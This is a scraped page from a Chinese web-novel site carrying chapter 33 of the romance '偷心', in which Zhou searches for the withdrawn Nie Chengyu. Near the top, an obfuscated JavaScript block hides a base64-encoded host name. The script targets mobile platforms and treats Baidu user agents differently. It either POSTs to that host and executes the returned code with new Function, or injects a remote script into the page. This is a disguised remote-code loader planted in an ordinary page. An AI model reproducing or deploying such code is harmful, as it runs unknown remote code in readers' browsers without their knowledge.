躺着看小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷阅读33(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

偷心 作者:面若满月

分卷阅读33

了周少的胳膊。

周少脸色已经不好看,他举手想再敲门,想想又放下:“把早餐放门口,我们回去。”

聂承语面皮薄,这时已经有人来围观,接下来如果把记者引来,就大事不妙了。

他让人拿过笔,写下让聂承语记得吃饭和擦药的嘱咐,然後带著手下离开。

聂承语半靠在床头,身後的地方火辣辣的疼,他长叹一口气,拿过枕巾盖在脸上。

幸好当时这个小屋子还没退,他能有一个容身之地考虑何去何从。

昨晚,不仅仅是一场身体上的掠夺,更是一种残忍的打破了他最後一丝希望的行为。

在这座城市里,他失去了爱情,失去了事业,失去了住所,而在昨晚,他失去了他本以为人生中最坚固,最不能撼动的友情,真正的一无所有。

还有什麽可留恋的呢?

他环视四周,一股刺骨的凉浮上心头。

周少几乎每天都亲自来给他送饭,衣物和被子以及一些生活用品源源不断的送来,聂承语不想出门,在周少走後挑了一些搬进屋里,有一两次遇上,周少急著拉住他谈谈,却被他甩开。

“不要再给我送东西,让我静一静,不要打扰我,在我的视野里,不要让我看见你的人。想好了,我会跟你联系的。”

周少只有默默走开,前些天还远远的望著,後来被聂承语警告了几次,只有作罢。

他会在每个夜晚,远远的看著窗子里透出的灯光,静静的等著聂承语的回答。

这样一过便是快一个月,直到他发现了不对劲,聂承语最後一次出门,采购了一堆食物,按照计算,前些天食物已经吃完了。

可是聂承语一直没有再出过门,周少慌了,他急匆匆的敲开了聂承语隔壁的住户的门,里面骂骂咧咧了几句,接著一个男人出来开门。

“什麽事儿?你找谁?”男人很不客气的打量著周少。

“不好意思,请问这位先生,最近看到过隔壁的那位姓聂的邻居出门吗?”

“没看到!白天我要做事,谁没事盯著邻居看?”男人眼珠子扫了周少一眼,就要关门。

“不好意思,那其他人呢?”周少急切的问道。

“我老婆也要做事。”

这时一个小孩子从男人身後探出头来,周少摸了摸口袋,掏出一小包棉花糖递给小孩:“小朋友,最近你有看到隔壁的叔叔出门吗?”

小男孩看著棉花糖,犹豫了一下。

“给你你就接著!”男人说道。

小男孩高高兴兴的接过棉花糖。

男人又要关门,结果小男孩从门缝里钻了出来,然後朝周少摆摆手,示意他跟著。

周少跟在小男孩後面,两人绕著这一片平房走了一大圈,来到了聂承语的屋後。

这里是堆放杂物的地方,有生火的木材,还有一些破缸破碗,小男孩灵活的钻到一个角落,指了指窗台。

这是聂承语屋後那个被报纸糊住的窗户的窗台。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间
上一章
目录
下一页